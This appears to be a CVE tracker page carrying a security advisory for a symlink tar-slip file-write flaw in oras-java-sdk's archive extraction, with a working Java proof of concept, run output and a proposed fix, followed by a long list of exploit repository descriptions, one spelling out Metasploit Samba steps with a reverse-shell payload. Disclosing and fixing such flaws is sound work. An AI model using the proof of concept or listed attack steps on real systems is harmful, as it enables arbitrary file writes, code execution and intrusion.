### Summary `ArchiveUtils.untar(InputStream, Path)` and `ArchiveUtils.unzip(InputStream, Path)` in `land.oras:oras-java-sdk` create symbolic-link entries from an archive without validating the symlink target. A malicious tar (or zip) shipped as an OCI layer blob can place a symlink under the extraction directory whose target points outside that directory, then ship a regular-file entry whose path traverses through that symlink. The subsequent `Files.newOutputStream` call follows the symlink and writes the file outside the caller's chosen `target` directory. This bypasses the existing `ensureSafeEntry` containment check, which only validates `entry.getName()` and not `entry.getLinkName()`. Reachable from the public `Registry.pullArtifact` / `OCILayout.pullArtifact` API whenever the manifest layer carries `io.deis.oras.content.unpack=true`, and from any direct caller of `ArchiveUtils.untar` / `ArchiveUtils.uncompressuntar` (e.g. consumers that pull an archive blob and extract it themselves, such as project-scaffolding CLIs that fetch templates from OCI registries). ### Affected versions `land.oras:oras-java-sdk` `<= 0.6.3` (current `main` commit `8e39dd54f0b9e981a5f246aefb851298187578e5`, file `src/main/java/land/oras/utils/ArchiveUtils.java` lines 400-443 for `untar`, lines 350-393 for `unzip`). Earlier path-traversal fix in PR #703 (released as `0.6.2`) addressed the `org.opencontainers.image.title` annotation sink (GHSA-xm96-gfjx-jcrc), but did not extend containment to symlink targets inside archive entries. ### Privilege required Network-position: any party able to serve an OCI artifact / archive blob that the victim's `oras-java-sdk`-based tool pulls and extracts. This includes: - A compromised or attacker-operated OCI registry endpoint (typo-squat, MITM, supply-chain into a public registry namespace). - A malicious upstream artifact author who pushes a single tampered blob to a registry the victim trusts. No registry authentication needed on the victim side beyond what is required to pull the artifact; the attack is fully driven by the contents of the layer the victim downloads. ### Root cause `src/main/java/land/oras/utils/ArchiveUtils.java` `untar(InputStream, Path)`, lines 400-443: ```java public static void untar(InputStream fis, Path target) { try { try (BufferedInputStream bis = new BufferedInputStream(fis); TarArchiveInputStream tais = new TarArchiveInputStream(bis)) { TarArchiveEntry entry; while ((entry = tais.getNextEntry()) != null) { // Check if the entry is outside the target directory ensureSafeEntry(entry, target); // validates entry.getName() only Path outputPath = target.resolve(entry.getName()).normalize(); if (entry.isDirectory()) { Files.createDirectories(outputPath); } else { Files.createDirectories(outputPath.getParent()); if (entry.isSymbolicLink()) { // entry.getLinkName() is NOT validated against target createSymbolicLink(outputPath, Paths.get(entry.getLinkName())); } else { // FOLLOWS the symlink if outputPath's parent is one try (OutputStream out = Files.newOutputStream(outputPath)) { tais.transferTo(out); } } } } } } catch (IOException e) { throw new OrasException("Failed to extract tar.gz file", e); } } ``` `ensureSafeEntry` (lines 261-268) only normalizes `entry.getName()` against `target`. `entry.getLinkName()` for symlink entries is passed straight to `createSymbolicLink`. The subsequent file-write code path uses `Files.newOutputStream` without `LinkOption.NOFOLLOW_LINKS`, so when a later entry's path traverses through the previously-created symlink, the write resolves the symlink and lands outside `target`. The same primitive applies to `unzip(InputStream, Path)` at lines 350-393 (symlink path at line 379 uses `createSymbolicLink(outputPath, Paths.get(linkStr))` without target validation). Reachability into the public API: - `Registry.pullArtifact` -> `pullLayer` (Registry.java:1088). When `io.deis.oras.content.unpack=true` is set on the layer, `pullLayer` calls `ArchiveUtils.untar(Files.newInputStream(tempArchive.getPath()), path)` at line 1109. The attacker-controlled blob is the input. - `OCILayout.pullArtifact` similar path through the layout's blob store. - Any direct caller of `ArchiveUtils.untar` / `ArchiveUtils.uncompressuntar` / `ArchiveUtils.unzip` from a downstream consumer that fetches an archive blob and extracts it. ### Proof of concept (E2E against deployed Maven Central `land.oras:oras-java-sdk:0.6.3`) `pom.xml`: ```xml <dependency> <groupId>land.oras</groupId> <artifactId>oras-java-sdk</artifactId> <version>0.6.3</version> </dependency> ``` `src/main/java/TarSlipPoc.java`: ```java import land.oras.utils.ArchiveUtils; import org.apache.commons.compress.archivers.tar.TarArchiveEntry; import org.apache.commons.compress.archivers.tar.TarArchiveOutputStream; import java.io.*; import java.nio.file.*; public class TarSlipPoc { public static void main(String[] args) throws Exception { Path tmp = Files.createTempDirectory("orasslip-"); Path target = tmp.resolve("safe-output"); Files.createDirectories(target); Path escapeFile = tmp.resolve("ESCAPED.txt"); Files.deleteIfExists(escapeFile); Path mtar = tmp.resolve("malicious.tar"); try (TarArchiveOutputStream tout = new TarArchiveOutputStream(Files.newOutputStream(mtar))) { tout.setLongFileMode(TarArchiveOutputStream.LONGFILE_POSIX); // Entry 1: symlink at "evil-link" pointing one dir above target TarArchiveEntry symlinkEntry = new TarArchiveEntry("evil-link", TarArchiveEntry.LF_SYMLINK); symlinkEntry.setLinkName(tmp.toAbsolutePath().toString()); symlinkEntry.setMode(0777); tout.putArchiveEntry(symlinkEntry); tout.closeArchiveEntry(); // Entry 2: regular file under "evil-link/" — write follows symlink byte[] data = "POC SUCCESS\n".getBytes(); TarArchiveEntry fileEntry = new TarArchiveEntry("evil-link/ESCAPED.txt"); fileEntry.setSize(data.length); fileEntry.setMode(0644); tout.putArchiveEntry(fileEntry); tout.write(data); tout.closeArchiveEntry(); } System.out.println("ESCAPED.txt pre-extract: " + Files.exists(escapeFile)); ArchiveUtils.untar(mtar, target); System.out.println("ESCAPED.txt post-extract (outside target): " + Files.exists(escapeFile)); } } ``` Run transcript (JDK 25, Apache Maven 3.9.16, `oras-java-sdk:0.6.3` from Maven Central): ``` === PRE-EXTRACT === target=/var/folders/7n/y98nrcg928ldg8685njy1qjc0000gn/T/orasslip-8932319985819096427/safe-output ESCAPED.txt exists: false === POST-EXTRACT === target listing: /var/folders/.../orasslip-.../safe-output /var/folders/.../orasslip-.../safe-output/evil-link (symlink) ESCAPED.txt exists outside target: true ESCAPED.txt contents: POC SUCCESS ** SYMLINK TAR-SLIP CONFIRMED ** ``` Negative control: same malicious tar, extracted through a routine that resolves `entry.getLinkName()` against the entry's parent and requires the result to stay under `target`, AND opens regular files with `LinkOption.NOFOLLOW_LINKS`: ``` === NEGATIVE CONTROL (link-target validation) === BLOCKED symlink 'evil-link' -> '/var/folders/.../orasslip-neg-...' (escapes target) ESCAPED.txt exists outside target: false ** NEGATIVE CONTROL OK — no escape, safe under fix ** ``` ### Impact - Arbitrary file write under the privileges of the JVM process that runs the SDK. Files in any directory the process can write to are overwritten, including build outputs, CI workspace siblings, `~/.bashrc`-style profile files when extraction happens under the user's home, and `~/.docker/config.json` / `~/.config/containers/auth.json` to plant attacker registry credentials. - Indirect code execution when the overwritten target is a shell init file, a cron drop-in, a systemd unit drop-in, an SSH `authorized_keys` (when extraction happens under a service account home), a Jenkins / Tekton task runner script, or any executable invoked by the surrounding pipeline. - Supply-chain pivot: any oras-java-sdk consumer that pulls an artifact and extracts it (project-scaffolding CLIs, Helm-OCI fetchers, plugin pull tools, CNCF artifact handlers) becomes a remote-attacker write primitive. CVSS 3.1 vector: `AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H` (~8.6 HIGH). The integrity impact is high because the attacker fully chooses both the link target path and the file payload; availability is high because critical files (cron, init scripts, application binaries on the CI worker) can be overwritten. ### Suggested fix Two complementary changes in `src/main/java/land/oras/utils/ArchiveUtils.java`. Both are required: the link-target check stops the symlink from being created in the first place; `LinkOption.NOFOLLOW_LINKS` is the second line of defense against any path that already contains a symlink (race, pre-existing target dir, etc.). (1) Validate symlink targets in `untar` and `unzip` against the normalized extraction root, paralleling the existing `ensureSafeEntry` shape: ```java private static void ensureSafeSymlinkTarget(Path outputPath, Path linkTarget, Path target) throws IOException { Path normalizedTarget = target.toAbsolutePath().normalize(); Path resolved = (linkTarget.isAbsolute() ? linkTarget : outputPath.getParent().resolve(linkTarget)).normalize(); if (!resolved.startsWith(normalizedTarget)) { throw new IOException( "Refusing to create symlink that escapes target dir: " + outputPath + " -> " + linkTarget); } } ``` Call this immediately before each `createSymbolicLink(...)` site (one in `untar`, one in `unzip`). (2) Open regular-file writes with `LinkOption.NOFOLLOW_LINKS` so a pre-existing symlink under the extraction path cannot be silently followed: ```java try (OutputStream out = Files.newOutputStream( outputPath, StandardOpenOption.CREATE_NEW, StandardOpenOption.WRITE, java.nio.file.LinkOption.NOFOLLOW_LINKS)) { tais.transferTo(out); // or zais.transferTo(out) for unzip } ``` `CREATE_NEW` (instead of the implicit `CREATE` + `TRUNCATE_EXISTING`) guarantees the open fails if the path resolves to an existing entry (symlink or regular file), and is consistent with archive extraction semantics where layers should not silently clobber siblings. A regression test that builds the malicious tar inline and asserts the post-extract state stays within `target` is the natural shape for `src/test/java/land/oras/utils/ArchiveUtilsTest.java`. ### Credit Reported by tonghuaroot.
PoC: CVE-2026-6307
Google Chrome CVE-2026-6307 PoC
PoC: root-sonim-xp3800
app that ports CVE-2019-2215 to arm32 and mounts a su binary to /sbin with denylist + root app installer. firehose/Magisk guide included
PoC: Linux-Kernel-Vulnerabilities-CVE-2026-23111
High Severity LPE vulnerability in Linux Kernel, with a CVS score of 7.8. An inverted check from user enables a process inside the container to break out of the sandbox along with full root privileges on user PC. I have been investigating about this vulnerability and has a lightweight script that runs in the terminal to check if you are vulnerable.
PoC: xperia_5_bl_unlocker_poc
My take on unlocking Xperia 5 SO-01M for p42 bootloader using CVE-2021-1931
PoC: cve-2026-23111-poc
scuffed PoC for CVE-2026-23111. Made and ran on Linux Kernel 6.12.69
PoC: CVE_ADC_IOC_2026
Citrix NetScaler CVE Preconditions Checker as per CTX696604 | Supported CVE : CVE-2026-8451, CVE-2026-8452, CVE-2026-8655, CVE-2026-10816, CVE-2026-10817, and CVE-2026-13474
PoC: CVE-2026-46300
CVE-2026-43284 - CVE-2026-43500 - CVE-2026-46300 Variant of dirtyfrag exploit
PoC: CVE-2025-69212-PoC
OpenSTAManager v2.9.8 and earlier versions contain a critical OS Command Injection vulnerability in the P7M (signed XML) file decoding function.
PoC: CVE-2026-24418
OpenSTAManager v2.9.8 and earlier contain a critical Error-Based SQL Injection vulnerability in the bulk operations handler for the Scadenzario (Payment Schedule) module.
PoC: CVE-2026-69212
Python poc, exploit for CVE-2025-69212
PoC: OpenSTAManager-RCE-Exploit-CVE-2026-38751
OpenSTAManager-RCE-Exploit-CVE-2026-38751
PoC: pagecache-lpe-containment-kit
Educational, defensive kit for two Linux page-cache-corruption LPEs (DirtyClone CVE-2026-43503, pedit COW CVE-2026-46331): hardening, detection, verification, seccomp + validation harness. Detection and prevention only — no exploit code. TLP:CLEAR.
PoC: CVE-2026-56782
Gorse < 0.5.10 contains an authentication bypass caused by empty admin_api_key in /api/dump and /api/restore endpoints, letting unauthenticated remote attackers access and modify protected data, exploit requires default empty admin_api_key configuration.
PoC: CVE-2026-54477
CVE-2026-54477: Admin Panel Missing Security Headers (clickjacking/XSS) - Gardyn (ICSA-26-183-03)
PoC: CVE-2026-55726
CVE-2026-55726: Publicly Listable Azure Blob Storage Container (device logs) - Gardyn (ICSA-26-183-03)
PoC: CVE-2026-52217-VTEX-Checkout-CrossTenant-IDOR
The VTEX Checkout Service exposes OrderForm data through the endpoints `/api/checkout/pub/orderForm/{orderFormId}` and `/attachments/*`. These endpoints do not validate the tenant (store account) of the authenticated session against the ownership of the requested OrderForm.
PoC: CVE-2026-13768
CVE-2026-13768: Privileged iothubowner IoT Hub credential — fleet enumeration, device RCE, home-network pivot — Gardyn (ICSA-26-183-03)
PoC: Code-27-Companion-Hub-Exploits
Proof of concept for CVE-2026-36027 and CVE-2026-36028
PoC: CVE-2026-38751-OpenSTAManager-Arbitrary-File-Upload-PoC
This repository contains a proof-of-concept (PoC) exploit for CVE-2026-38751, affecting OpenSTAManager ≤ 2.10. The vulnerability allows an authenticated attacker to upload a malicious module via the module update functionality, leading to arbitrary file upload and remote code execution (RCE).
PoC: CVE-2025-57819
CVE-2025-57819 - FreePBX Unauthenticated Remote Code Execution (RCE)
PoC: CVE-2026-48558
SimpleHelp OIDC Authentication Bypass PoC
PoC: Vulnerability-scanner
DESIGN AND IMPLEMENTATION OF A VULNERABILITY SCANNER FOR CVE-2026-45498 IN MICROSOFT DEFENDER
PoC: CVE-2026-33017
Python POC, Exploit for CVE-2026-33017
PoC: CVE-2021-27877-PoC
A modified version of the Rapid7 Metasploit module for CVE-2021-27877 that supports direct command execution for reliable vulnerability validation. Includes documentation explaining the exploit workflow, the module modifications, and usage examples.
PoC: CVE-2026-30784-rustdesk-poc
CVE-2026-30784: RustDesk hbbs Traffic Amplification PoC & PCAP Analysis
PoC: CVE-2026-52813
Gogs has Path Traversal in organization name that results in RCE through Git hooks
PoC: CVE-2026-53753
Crawl4AI <= 0.8.6 pre-auth RCE via AST sandbox escape (gi_frame.f_back.f_builtins chain) — CVSS 10.0
PoC: CVE-2025-69212
CVE-2025-69212 Proof-of-concept.
PoC: OpenSTAManager_RCE_Exploit-CVE-2026-38751-
OpenSTAManager RCE Exploit (CVE-2026-38751)
PoC: CVE-2025-69212-PoC
CVE-2025-69212 - OpenSTAManager OS Command Injection PoC
PoC: F5-BIG-IP
O F5 BIG-IP é uma plataforma de entrega e segurança de aplicações amplamente utilizada em ambientes corporativos. A CVE-2020-5902 é uma vulnerabilidade crítica no TMUI que, em versões não corrigidas, pode permitir acesso não autorizado e execução remota de código, reforçando a necessidade de atualização e gestão contínua de vulnerabilidades.
PoC: CVE-2026-6307-Longinus
CVE-2026-6307 PoC: Longinus - 2 Boundaries in One Bug https://nebusec.ai/research/v8-cve-2026-6307-writeup/)
PoC: CVE-2026-48907
CVE-2026-48907 PoC
PoC: CVE-2026-43735
Safari 跨域信息读取
PoC: cve-2025-24054-lab
Blue-team lab: detecting & mitigating CVE-2025-24054 (Windows NTLM hash disclosure) with Sysmon, Wazuh SIEM, and Group Policy
PoC: CVE-2026-42945
A flaw was found in NGINX, specifically within the ngx_http_rewrite_module. An unauthenticated attacker can exploit this vulnerability by sending crafted HTTP requests under specific rewrite configurations. This can lead to a heap buffer overflow in the NGINX worker process, which may result in arbitrary code execution
PoC: CVE-2026-51947-Advisory
Pivotal CRM's patch for an initial deserialization vulnerability was incomplete. The fix switched from BinaryFormatter to JSON.NET but left TypeNameHandling set to 4 without implementing SerializationBinder, allowing attackers to execute arbitrary code through malicious $type payloads. Fixed in 6.6.5.10 and Patch_CWE502_20260316.zip
PoC: CVE-2026-46331
pedit COW
PoC: Incident-Response-Report-TeamCity-Compromise-CVE-2024-27198-
CyberDefenders JetBrains Lab
PoC: CVE-2026-55488
motionEye's Absolute Path Traversal in Media File Handlers Allows Arbitrary File Read
PoC: CVE-2026-58138-Conductor-Unauth-RCE
CVE-2026-58138 — Conductor (3.21.21..<3.30.2) unauthenticated RCE via INLINE GraalVM evaluator (HostAccess.ALL). Lab + PoC, verified e2e (root).
PoC: CVE-2026-46490-samlify-SAML-Attribute-Injection
CVE-2026-46490 — samlify <2.13.0 SAML AttributeValue XML injection -> signed-assertion privilege escalation. Self-contained PoC, verified e2e.
PoC: CVE-2025-40271
CVE-2025-40271 Modifed By MadEploits
PoC: cve-2026-46331-pedit-cow-auditd-detection
Defensive validation of CVE-2026-46331 / pedit COW with auditd, AppArmor, mitigation comparison and detection logic.
PoC: cve-2015-1187-dir820l-reproduction
Independent reverse engineering and reproduction of CVE-2015-1187, an unauthenticated command injection in the D-Link DIR-820L (Rev A, v1.05B03). MIPS firmware extraction with binwalk, static analysis in Ghidra, and tracing the `ping_addr` parameter to its command-execution sink.
PoC: CVE-2012-1823
CVE-2012-1823 - PHP CGI Argument Injection Remote Code Execution (RCE)
PoC: CVE-2026-22557-Path-Traversal-Ubiquti-UniFi
CVE-2026-22557 Path Traversal Ubiquti UniFi Network Application
PoC: CVE-2026-48907
POC for CVE-2026-48907
PoC: CVE-2026-49869
Kestra Auth-Bypass Vulnerability Checker
PoC: CVE-2026-31694-POC
Linux kernel FUSE readdir cache out-of-bounds write (CVE-2026-31694): a malicious FUSE server overflows a page-cache page by 24 bytes. PoC plus an unprivileged local-root exploit via /etc/passwd page-cache corruption. Run only inside a VM.
PoC: IS
Ovaj sto se skida isto ovaj s metasplotiom kucas msf console pa onda search CVE-2017-7494 pa use exploit/linux/samba/is_known_pipeline pa show options pa set RHOSTS (ip servera) set RPORt 445 (port za tu ranjivist) SET payload linux/x86/meterpreter/reverse_tcp SET LHOST ip kalija SET LORT 4444 pa exploit i ako je ranjiv dobijemo sesiju
PoC: CVE-2026-46331
Chequeo y Fix de la vulnerabilidad "pedit COW"
PoC: CVE-2025-45422---Bbox
CVE-2025-45422: Proximus b-box UPnP Persistence & Access Control Bypass
PoC: CVE-2026-10580
PoC exploit for CVE-2026-10580 - Authentication Bypass in Hippoo Mobile App for WooCommerce <= 1.9.4 leading to Admin Account Takeover
PoC: CVE-2026-56121-Feast-Unauth-RCE
CVE-2026-56121 — Feast <0.63.0 unauthenticated RCE via gRPC registry dill.loads of OnDemandFeatureView UDF (pre-auth). Lab + PoC, verified e2e.
PoC: CVE-2026-46817
CVE-2026-46817 - Draft
PoC: CVE-2026-8037
CVE-2026-8037 - Draft
PoC: CVE-2026-27626-PoC
OliveTin is a self-hosted web UI for exposing predefined shell commands to end users. This repository contains a proof-of-concept demonstrating two independent OS command injection vectors in OliveTin's Shell mode execution path, both of which bypass the application's intended shell-argument safety checks.
PoC: cve-2024-31317
Detailed discussion of Zygote vulnerability CVE-2024-31317
PoC: CVE-2026-43700
https://support.apple.com/en-us/127685#:~:text=2026%2D43704%3A%20dr3dd-,WebKit,-Available%20for%3A%20macOS
PoC: CVE-2026-44789-n8n-PrototypePollution-RCE
CVE-2026-44789 — n8n <1.123.43 HTTP Request pagination prototype pollution to RCE (NODE_OPTIONS runner-spawn gadget). Lab + automated PoC, verified e2e.
PoC: CVE-2023-43364-Searchor-RCE-Exploit
POC exploit via unsafe `eval()` usage in Searchor (≤ 2.4.2)
PoC: CVE-2026-46817
CVE-2026-46817
PoC: cve-2026-46331-audit
cve-2026-46331-audit script
PoC: CVE-2026-56782-Gorse-Auth-Bypass
CVE-2026-56782 — Gorse <0.5.10 unauthenticated DB dump/restore (admin_api_key fail-open). Lab + PoC, verified e2e.
PoC: cve-2026-0000-reference
NIST CVE-2026-0000 Keylogger Analysis
PoC: CVE-2026-48907
CVE-2026-48907 – Joomla JCE Unauthenticated Remote Code Execution (RCE)
PoC: CVE-2026-53753-Crawl4AI-RCE
CVE-2026-53753 — Crawl4AI <0.8.7 unauthenticated RCE (AST sandbox escape via gi_frame.f_back). Lab + PoC, verified e2e.
PoC: cve-2023-4911-exploit-optimized
Pure C exploit for CVE-2023-4911 (Looney Tunables). No Python required. Features multi-processing brute-forcing, dynamic calibration, and integrated ELF parser.
PoC: CVE_2024_1086_vulnerability_check
CVE-2024-1086 vulnerability
PoC: CVE-2026-43503
DirtyClone - local privilege escalation (LPE) proof-of-concept targeting a kernel/XFRM-related vulnerability described in the source as CVE-2026-43503
PoC: cve-2026-9082-drupal
drupal-postgresql-rce
PoC: graylog-cve-2024-24824-exploit
Proof-of-concept exploit for CVE-2024-24824 demonstrating how an arbitrary class loading primitive can be transformed into remote code execution on vulnerable Graylog deployments.
PoC: CVE-2026-55200
CVE-2026-55200 - Critical libssh2 Remote Code Execution Vulnerability
PoC: By-Poloss..-..CVE-2026-48939
iCagenda Unauthenticated File Upload to RCE
PoC: cve-2025-0133
CVE-2025-0133 Scanner | Palo Alto GlobalProtect XSS Checker
PoC: CVE-2026-22226
Proof of Concept for the CVE-2026-22226
PoC: CVE-2026-20253
POC for CVE-2026-20253
PoC: Joomla_CVE_2026_48907
cve-2026-48907 scanner
PoC: DirtyClone
Python Proof of Concept for DirtyClone (CVE-2026-43503) - Linux kernel LPE via page-cache corruption
PoC: WiseDelete
Windows utility that demonstrates user-mode interaction with the vulnerable WiseDelfile64.sys driver and uses CVE-2025-66680 to perform kernel-assisted file deletion.
PoC: CVE-2025-55182-React2Shell-RCE
React2Shell (CVE-2025-55182) PoC
PoC: CVE-2026-48908
Unauthenticated RCE PoC for CVE-2026-48908 SP Page Builder (Joomla) arbitrary file upload and remote code execution exploit with mass scaning support.
PoC: WiseDelete
A lightweight Windows utility demonstrating user-mode interaction with the vulnerable WiseDelfile64.sys driver using CVE-2025-66680 to perform kernel-assisted file deletion.
PoC: CVE-2026-23918-Double-free-Apache-httpd-mod_http2
Double-free in Apache httpd mod_http2 stream cleanup leading to pre-auth RCE
PoC: CVE-2018-18778
CVE-2018-18778 - ACME mini_httpd Arbitrary File Read
PoC: CVE-2023-0386-OverlayFS
Copy fake in-memory files to disk using overlayFS
PoC: CVE-2026-49048-JoomCCK-SQLi
CVE-2026-49048 — JoomCCK 6.4.0 Unauthenticated SQL Injection (CVSS 9.8)
PoC: crypto-lab-merkle-proofs
Browser-based Merkle tree demo — build a tree, generate inclusion proofs, recompute the root hash by hash, and replay the RFC 6962 second-preimage and CVE-2012-2459 attacks. Real SHA-256. No backend.
PoC: react2shell-exploit
React2Shell: CVE-2025-55182
PoC: CVE-2026-12485
CVE-2026-12485
PoC: DevHub-HTB-Walkthrough
Hack The Box - DevHub Machine Walkthrough (Medium Linux, CVE-2026-23744, Chisel Tunneling, Jupyter, Root Privilege Escalation)
PoC: CVE-2026-41179
POC for CVE-2026-41179
PoC: dirtyclone-exploit
CVE-2026-46331 — Linux Kernel Local Privilege Escalation TC pedit + IPsec TEE Page Cache Corruption · Affected kernels: ≤ 6.12.9
PoC: CVE-2026-27654
Обзор n-day уязвимости на русском языке.
PoC: CVE-2026-41940-PoC
CVE-2026-41940 authentication bypass vulnerability proof-of-concept
PoC: laravel-filemanager-unrestricted-upload
PoC for CVE-2025-56399 - Unrestricted File Upload leading to RCE in alexusmai/laravel-file-manager (≤3.3.1). Automates detection, CSRF extraction, and File Upload
PoC: DirtyClone
DirtyClone - local privilege escalation (LPE) proof-of-concept targeting a kernel/XFRM-related vulnerability described in the source as CVE-2026-43503
PoC: CVE-2025-69212-Authenticated-RCE-PoC
Automated PoC for CVE-2025-69212 - OpenSTAManager <=2.9.8 authenticated RCE
PoC: ffmpeg-jellyfix
patched ffmpeg-tools for jellyfin to patch CVE-2026-8461 aka PixelSmash
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
Get alerted for CVEs like this
Register your stack and get notified within minutes when a matching CVE drops.
Start monitoring free